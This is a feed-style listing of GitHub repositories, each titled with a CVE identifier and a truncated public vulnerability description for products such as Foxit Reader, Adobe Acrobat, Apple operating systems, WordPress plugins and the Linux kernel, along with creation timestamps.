**Jenkins Dingding[??] Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10433](https://github.com/Live-Hack-CVE/CVE-2019-10433) create time: 2022-12-29T06:20:10Z

**Untrusted search path in FileZilla before 3.41.0-rc1 allows an attacker to gain privileges via a malicious 'fzsftp' binary in the user's home directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5429](https://github.com/Live-Hack-CVE/CVE-2019-5429) create time: 2022-12-29T06:19:23Z

**Adobe Acrobat and Reader versions 2019.010.20098 and earlier, 2019.010.20098 and earlier, 2017.011.30127 and earlier version, and 2015.006.30482 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure . CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7061](https://github.com/Live-Hack-CVE/CVE-2019-7061) create time: 2022-12-29T06:14:31Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Bitdefender SafePay 23.0.10.34. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of TIScri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6737](https://github.com/Live-Hack-CVE/CVE-2019-6737) create time: 2022-12-29T06:14:20Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samsung Galaxy S9 prior to January 2019 Security Update (SMR-JAN-2019 - SVE-2018-13467). User interaction is required to exploit this vulnerability in that the target must connect to a wireless network. The specific flaw CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6741](https://github.com/Live-Hack-CVE/CVE-2019-6741) create time: 2022-12-29T05:43:15Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Studio Photo 3.6.6. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of EZI files. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6750](https://github.com/Live-Hack-CVE/CVE-2019-6750) create time: 2022-12-29T05:43:11Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Studio Photo 3.6.6.779. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of JPG files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6751](https://github.com/Live-Hack-CVE/CVE-2019-6751) create time: 2022-12-29T05:43:03Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.3.0.10826. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the St CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6753](https://github.com/Live-Hack-CVE/CVE-2019-6753) create time: 2022-12-29T05:42:53Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Studio Photo 3.6.6. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of EZIX files. Th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6749](https://github.com/Live-Hack-CVE/CVE-2019-6749) create time: 2022-12-29T05:42:50Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Studio Photo 3.6.6. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of EZI files. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6748](https://github.com/Live-Hack-CVE/CVE-2019-6748) create time: 2022-12-29T05:42:46Z

**In the Linux kernel before 4.20.14, expand_downwards in mm/mmap.c lacks a check for the mmap minimum address, which makes it easier for attackers to exploit kernel NULL pointer dereferences on non-SMAP platforms. This is related to a capability check for the wrong task. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9213](https://github.com/Live-Hack-CVE/CVE-2019-9213) create time: 2022-12-29T05:42:15Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the XFA remerge method. The issue results CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6727](https://github.com/Live-Hack-CVE/CVE-2019-6727) create time: 2022-12-29T05:42:08Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of PDF files. The i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6728](https://github.com/Live-Hack-CVE/CVE-2019-6728) create time: 2022-12-29T05:42:05Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the popUpMenu method. The issue results fr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6730](https://github.com/Live-Hack-CVE/CVE-2019-6730) create time: 2022-12-29T05:42:01Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.3.10826. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the localFileStorage method. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6754](https://github.com/Live-Hack-CVE/CVE-2019-6754) create time: 2022-12-29T05:41:58Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit PhantomPDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of PDF files. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6733](https://github.com/Live-Hack-CVE/CVE-2019-6733) create time: 2022-12-29T05:41:38Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit PhantomPDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the setInterva CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6734](https://github.com/Live-Hack-CVE/CVE-2019-6734) create time: 2022-12-29T05:41:35Z

**Adobe InDesign versions 14.0.1 and below have an unsafe hyperlink processing vulnerability. Successful exploitation could lead to arbitrary code execution. Fixed in versions 13.1.1 and 14.0.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7107](https://github.com/Live-Hack-CVE/CVE-2019-7107) create time: 2022-12-29T05:41:32Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of PDF files. The i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6735](https://github.com/Live-Hack-CVE/CVE-2019-6735) create time: 2022-12-29T05:41:28Z

**Adobe Acrobat and Reader versions 2019.010.20098 and earlier, 2019.010.20098 and earlier, 2017.011.30127 and earlier version, and 2015.006.30482 and earlier have an use after free vulnerability. Successful exploitation could lead to arbitrary code execution . CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7088](https://github.com/Live-Hack-CVE/CVE-2019-7088) create time: 2022-12-29T05:41:25Z

**Adobe Flash Player versions 32.0.0.156 and earlier, 32.0.0.156 and earlier, and 32.0.0.156 and earlier have an use after free vulnerability. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7096](https://github.com/Live-Hack-CVE/CVE-2019-7096) create time: 2022-12-29T05:41:21Z

**Adobe Flash Player versions 32.0.0.156 and earlier, 32.0.0.156 and earlier, and 32.0.0.156 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure . CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7108](https://github.com/Live-Hack-CVE/CVE-2019-7108) create time: 2022-12-29T05:41:18Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Studio Photo 3.6.6. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of EZI files. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6747](https://github.com/Live-Hack-CVE/CVE-2019-6747) create time: 2022-12-29T05:39:39Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.3.10826. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within ConvertToPDF_x86.dll. The issue CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6755](https://github.com/Live-Hack-CVE/CVE-2019-6755) create time: 2022-12-29T05:39:25Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit PhantomPDF 9.4.0.16811. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of HTM CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6756](https://github.com/Live-Hack-CVE/CVE-2019-6756) create time: 2022-12-29T05:38:40Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.4.16811. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within ConvertToPDF_x86.dll. The issue CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6757](https://github.com/Live-Hack-CVE/CVE-2019-6757) create time: 2022-12-29T05:38:16Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.4.16811. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within ConvertToPDF_x86.dll. Th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6758](https://github.com/Live-Hack-CVE/CVE-2019-6758) create time: 2022-12-29T05:37:59Z

**This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Studio Photo 3.6.6. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of TIF fi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6746](https://github.com/Live-Hack-CVE/CVE-2019-6746) create time: 2022-12-29T05:37:45Z

**This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.3.10826. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within ConvertToPDF_x86.dll. The issue CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6759](https://github.com/Live-Hack-CVE/CVE-2019-6759) create time: 2022-12-29T05:37:35Z

**The fix for the Linux kernel in Ubuntu 18.04 LTS for CVE-2019-14615 ("The Linux kernel did not properly clear data structures on context switches for certain Intel graphics processors.") was discovered to be incomplete, meaning that in versions of the kernel before 4.15.0-91.92, an attacker could use this vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8832](https://github.com/Live-Hack-CVE/CVE-2020-8832) create time: 2022-12-29T06:21:04Z

**In Puma (RubyGem) before 4.3.2 and before 3.12.3, if an application using Puma allows untrusted input in a response header, an attacker can use newline characters (i.e. `CR`, `LF` or`/r`, `/n`) to end the header and inject malicious content, such as additional headers or an entirely new response body. This vulnerabilit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5247](https://github.com/Live-Hack-CVE/CVE-2020-5247) create time: 2022-12-29T06:15:34Z

**An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Opening a maliciously crafted PDF file may lead to an unexpected ap CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9876](https://github.com/Live-Hack-CVE/CVE-2020-9876) create time: 2022-12-29T06:15:30Z

**A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9906](https://github.com/Live-Hack-CVE/CVE-2020-9906) create time: 2022-12-29T06:15:27Z

**An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 14.2 and iPadOS 14.2, tvOS 14.2, watchOS 7.1. Processing a maliciously crafted audio file may lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27909](https://github.com/Live-Hack-CVE/CVE-2020-27909) create time: 2022-12-29T06:14:56Z

**Matrix is an ecosystem for open federated Instant Messaging and VoIP. Synapse is a reference "homeserver" implementation of Matrix. A malicious or poorly-implemented homeserver can inject malformed events into a room by specifying a different room id in the path of a `/send_join`, `/send_leave`, `/invite` or `/exchange CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26257](https://github.com/Live-Hack-CVE/CVE-2020-26257) create time: 2022-12-29T06:14:53Z

**A NULL pointer dereference was found in OpenLDAP server and was fixed in openldap 2.4.55, during a request for renaming RDNs. An unauthenticated attacker could remotely crash the slapd process by sending a specially crafted request, causing a Denial of Service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25692](https://github.com/Live-Hack-CVE/CVE-2020-25692) create time: 2022-12-29T06:14:12Z

**NLnet Labs Unbound, up to and including version 1.12.0, and NLnet Labs NSD, up to and including version 4.3.3, contain a local vulnerability that would allow for a local symlink attack. When writing the PID file, Unbound and NSD create the file if it is not there, or open an existing file for writing. In case the file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28935](https://github.com/Live-Hack-CVE/CVE-2020-28935) create time: 2022-12-29T06:14:05Z

**A path handling issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.0.1. A remote attacker may be able to modify the file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27896](https://github.com/Live-Hack-CVE/CVE-2020-27896) create time: 2022-12-29T05:42:22Z

**Some sensitive cookies in SAP Disclosure Management, version 10.1, are missing HttpOnly flag, leading to sensitive cookie without Http Only flag. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6267](https://github.com/Live-Hack-CVE/CVE-2020-6267) create time: 2022-12-29T05:42:19Z

**A use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.1, iOS 14.2 and iPadOS 14.2, iCloud for Windows 11.5, Safari 14.0.1, tvOS 14.2, iTunes 12.11 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27918](https://github.com/Live-Hack-CVE/CVE-2020-27918) create time: 2022-12-29T05:42:12Z

**A vulnerability has been identified in JT2Go (All versions < V13.1.0.1), Solid Edge SE2020 (All Versions < SE2020MP12), Solid Edge SE2021 (All Versions < SE2021MP2), Teamcenter Visualization (All versions < V13.1.0.1). Affected applications lack proper validation of user-supplied data when parsing PAR files. This can r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28383](https://github.com/Live-Hack-CVE/CVE-2020-28383) create time: 2022-12-29T05:41:07Z

**A Null Pointer Dereference vulnerability exists in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.35, in scan_unit_for_symbols, as demonstrated in addr2line, that can cause a denial of service via a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16593](https://github.com/Live-Hack-CVE/CVE-2020-16593) create time: 2022-12-29T05:40:19Z

**A denial of service via regular expression in the py.path.svnwc component of py (aka python-py) through 1.9.0 could be used by attackers to cause a compute-time denial of service attack by supplying malicious input to the blame functionality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29651](https://github.com/Live-Hack-CVE/CVE-2020-29651) create time: 2022-12-29T05:40:12Z

**The Cryptocurrency Pricing list and Ticker WordPress plugin through 1.5 does not sanitise and escape the ccpw_setpage parameter before outputting it back in pages where its shortcode is embed, leading to a Reflected Cross-Site Scripting issue CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25044](https://github.com/Live-Hack-CVE/CVE-2021-25044) create time: 2022-12-29T06:22:34Z

**An entity in Network Configuration Manager product is misconfigured and exposing password field to Solarwinds Information Service (SWIS). Exposed credentials are encrypted and require authenticated access with an NCM role. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35226](https://github.com/Live-Hack-CVE/CVE-2021-35226) create time: 2022-12-29T06:21:59Z

**A logic issue was addressed with improved validation. This issue is fixed in Security Update 2021-008 Catalina, macOS Big Sur 11.6.2. An application may be able to execute arbitrary code with kernel privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30935](https://github.com/Live-Hack-CVE/CVE-2021-30935) create time: 2022-12-29T06:21:00Z

**Description: A memory corruption issue in the processing of ICC profiles was addressed with improved input validation. This issue is fixed in macOS Monterey 12.1, watchOS 8.3, iOS 15.2 and iPadOS 15.2, tvOS 15.2. Processing a maliciously crafted image may lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30926](https://github.com/Live-Hack-CVE/CVE-2021-30926) create time: 2022-12-29T06:20:53Z

**Multiple out-of-bounds write issues were addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.1. A malicious application may be able to execute arbitrary code with kernel privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30922](https://github.com/Live-Hack-CVE/CVE-2021-30922) create time: 2022-12-29T06:20:39Z

**The issue was addressed with improved permissions logic. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.6.1. An unprivileged application may be able to edit NVRAM variables. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30913](https://github.com/Live-Hack-CVE/CVE-2021-30913) create time: 2022-12-29T06:20:32Z

**This issue was addressed with improved checks. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, tvOS 15.1, watchOS 8.1, macOS Big Sur 11.6.1. A local attacker may be able to elevate their privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30906](https://github.com/Live-Hack-CVE/CVE-2021-30906) create time: 2022-12-29T06:20:20Z

**This issue was addressed with improved checks. This issue is fixed in iOS 14.8.1 and iPadOS 14.8.1, iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1. A local attacker may be able to cause unexpected application termination or arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30903](https://github.com/Live-Hack-CVE/CVE-2021-30903) create time: 2022-12-29T06:20:03Z

**A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.0.2 and iPadOS 15.0.2, tvOS 15.1, watchOS 8.1, macOS Monterey 12.0.1. A malicious application may be able to access information about a user's contacts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30895](https://github.com/Live-Hack-CVE/CVE-2021-30895) create time: 2022-12-29T06:19:59Z

**A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1. A malicious application may be able to elevate privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30873](https://github.com/Live-Hack-CVE/CVE-2021-30873) create time: 2022-12-29T06:19:56Z

**A logic issue was addressed with improved state management. This issue is fixed in Security Update 2021-005 Catalina, macOS Big Sur 11.6. A remote attacker may be able to leak memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30844](https://github.com/Live-Hack-CVE/CVE-2021-30844) create time: 2022-12-29T06:19:37Z

**This issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.0.1. Unpacking a maliciously crafted archive may allow an attacker to write arbitrary files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30833](https://github.com/Live-Hack-CVE/CVE-2021-30833) create time: 2022-12-29T06:19:30Z

**Authenticated (admin+) Reflected Cross-Site Scripting (XSS) vulnerability in Gabe Livan's Asset CleanUp: Page Speed Booster plugin <= 1.3.8.4 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36899](https://github.com/Live-Hack-CVE/CVE-2021-36899) create time: 2022-12-29T06:19:05Z

**A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6, watchOS 8, tvOS 15, iOS 14.8 and iPadOS 14.8, iOS 15 and iPadOS 15. Processing a maliciously crafted image may lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30928](https://github.com/Live-Hack-CVE/CVE-2021-30928) create time: 2022-12-29T06:18:47Z

**FreeRTOS versions 10.2.0 through 10.4.5 do not prevent non-kernel code from calling the xPortRaisePrivilege internal function to raise privilege. FreeRTOS versions through 10.4.6 do not prevent a third party that has already independently gained the ability to execute injected code to achieve further privilege escalati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43997](https://github.com/Live-Hack-CVE/CVE-2021-43997) create time: 2022-12-29T06:17:58Z

**Encode OSS httpx < 0.23.0 is affected by improper input validation in `httpx.URL`, `httpx.Client` and some functions using `httpx.URL.copy_with`. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41945](https://github.com/Live-Hack-CVE/CVE-2021-41945) create time: 2022-12-29T06:17:40Z

**Layer 2 network filtering capabilities such as IPv6 RA guard can be bypassed using LLC/SNAP headers with invalid length and Ethernet to Wifi frame conversion (and optionally VLAN0 headers). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27862](https://github.com/Live-Hack-CVE/CVE-2021-27862) create time: 2022-12-29T06:16:11Z

**Layer 2 network filtering capabilities such as IPv6 RA guard can be bypassed using LLC/SNAP headers with invalid length (and optionally VLAN0 headers) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27861](https://github.com/Live-Hack-CVE/CVE-2021-27861) create time: 2022-12-29T06:16:08Z

**Layer 2 network filtering capabilities such as IPv6 RA guard can be bypassed using combinations of VLAN 0 headers, LLC/SNAP headers, and converting frames from Ethernet to Wifi and its reverse. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27854](https://github.com/Live-Hack-CVE/CVE-2021-27854) create time: 2022-12-29T06:16:05Z

**Puma is a HTTP 1.1 server for Ruby/Rack applications. Prior to versions 5.5.1 and 4.3.9, using `puma` with a proxy which forwards HTTP header values which contain the LF character could allow HTTP request smugggling. A client could smuggle a request through a proxy, causing the proxy to send a response back to another CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41136](https://github.com/Live-Hack-CVE/CVE-2021-41136) create time: 2022-12-29T06:15:47Z

**A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiOS version 6.0.0 through 6.0.14, FortiOS version 6.2.0 through 6.2.10, FortiOS version 6.4.0 through 6.4.8, FortiOS version 7.0.0 through 7.0.3 allows attacker to execute privileged commands on a linked FortiSw CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44171](https://github.com/Live-Hack-CVE/CVE-2021-44171) create time: 2022-12-29T05:36:15Z

**The Slider, Gallery, and Carousel by MetaSlider WordPress plugin before 3.27.9 does not sanitise and escape some of its Gallery Image parameters, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in mul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2823](https://github.com/Live-Hack-CVE/CVE-2022-2823) create time: 2022-12-29T06:22:52Z

**Slack Morphism is a modern client library for Slack Web/Events API/Socket Mode and Block Kit. Debug logs expose sensitive URLs for Slack webhooks that contain private information. The problem is fixed in version 1.3.2 which redacts sensitive URLs for webhooks. As a workaround, people who use Slack webhooks may disable CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39292](https://github.com/Live-Hack-CVE/CVE-2022-39292) create time: 2022-12-29T06:22:47Z

**An HTML injection vulnerability exists in CERT/CC VINCE software prior to 1.50.4. An authenticated attacker can inject arbitrary HTML via form using the "Product Affected" field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40248](https://github.com/Live-Hack-CVE/CVE-2022-40248) create time: 2022-12-29T06:22:44Z

**An HTML injection vulnerability exists in CERT/CC VINCE software prior to 1.50.4. An authenticated attacker can inject arbitrary HTML via a crafted email with HTML content in the Subject field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40257](https://github.com/Live-Hack-CVE/CVE-2022-40257) create time: 2022-12-29T06:22:40Z

**The reSmush.it WordPress plugin before 0.4.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when unfiltered_html is disallowed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2448](https://github.com/Live-Hack-CVE/CVE-2022-2448) create time: 2022-12-29T06:22:37Z

**AP Manager in Innovaphone before 13r2 Service Release 17 allows command injection via a modified service ID during app upload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41870](https://github.com/Live-Hack-CVE/CVE-2022-41870) create time: 2022-12-29T06:22:30Z

**Improper access control vulnerability in FACM application prior to SMR Oct-2022 Release 1 allows a local attacker to connect arbitrary AP and Bluetooth devices. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39855](https://github.com/Live-Hack-CVE/CVE-2022-39855) create time: 2022-12-29T06:22:27Z

**Open Redirect in GitHub repository ikus060/rdiffweb prior to 2.5.0a4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3438](https://github.com/Live-Hack-CVE/CVE-2022-3438) create time: 2022-12-29T06:22:22Z

**An origin validation error vulnerability in Trend Micro Apex One agents could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41749](https://github.com/Live-Hack-CVE/CVE-2022-41749) create time: 2022-12-29T06:22:10Z

**The aeson library is not safe to use to consume untrusted JSON input. A remote user could abuse this flaw to produce a hash collision in the underlying unordered-containers library by sending specially crafted JSON data, resulting in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3433](https://github.com/Live-Hack-CVE/CVE-2022-3433) create time: 2022-12-29T06:22:06Z

**The Disable User Login WordPress plugin through 1.0.1 does not have authorisation and CSRF checks when updating its settings, allowing unauthenticated attackers to block (or unblock) users at will. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2350](https://github.com/Live-Hack-CVE/CVE-2022-2350) create time: 2022-12-29T06:22:02Z

**Improper restriction of broadcasting Intent in MouseNKeyHidDevice prior to SMR Oct-2022 Release 1 leaks MAC address of the connected Bluetooth device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36868](https://github.com/Live-Hack-CVE/CVE-2022-36868) create time: 2022-12-29T06:21:55Z

**mfa/FIDO2.py in django-mfa2 before 2.5.1 and 2.6.x before 2.6.1 allows a replay attack that could be used to register another device for a user. The device registration challenge is not invalidated after usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42731](https://github.com/Live-Hack-CVE/CVE-2022-42731) create time: 2022-12-29T06:21:52Z

**An out of bounds write in hermes, while handling large arrays, prior to commit 06eaec767e376bfdb883d912cb15e987ddf2bda1 allows attackers to potentially execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, mos CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32234](https://github.com/Live-Hack-CVE/CVE-2022-32234) create time: 2022-12-29T06:21:48Z

**Improper access control vulnerability cloudNotificationManager.java in SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via implicit broadcasts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39871](https://github.com/Live-Hack-CVE/CVE-2022-39871) create time: 2022-12-29T06:21:45Z

**A write-what-where condition in hermes caused by an integer overflow, prior to commit 5b6255ae049fa4641791e47fad994e8e8c4da374 allows attackers to potentially execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35289](https://github.com/Live-Hack-CVE/CVE-2022-35289) create time: 2022-12-29T06:21:25Z

**Improper access control vulnerability in cloudNotificationManager.java SmartThings prior to version 1.7.89.0 allows attackers to access sensitive information via PUSH_MESSAGE_RECEIVED broadcast. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39870](https://github.com/Live-Hack-CVE/CVE-2022-39870) create time: 2022-12-29T06:21:21Z

**An integer conversion error in Hermes bytecode generation, prior to commit 6aa825e480d48127b480b08d13adf70033237097, could have been used to perform Out-Of-Bounds operations and subsequently execute arbitrary code. Note that this is only exploitable in cases where Hermes is used to execute untrusted JavaScript. Hence, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40138](https://github.com/Live-Hack-CVE/CVE-2022-40138) create time: 2022-12-29T06:21:18Z

**Metro UI v4.4.0 to v4.5.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Javascript function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41376](https://github.com/Live-Hack-CVE/CVE-2022-41376) create time: 2022-12-29T06:21:15Z

**Use after free vulnerability in set_nft_pid and signal_handler function of NFC driver prior to SMR Oct-2022 Release 1 allows attackers to perform malicious actions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39847](https://github.com/Live-Hack-CVE/CVE-2022-39847) create time: 2022-12-29T06:21:11Z

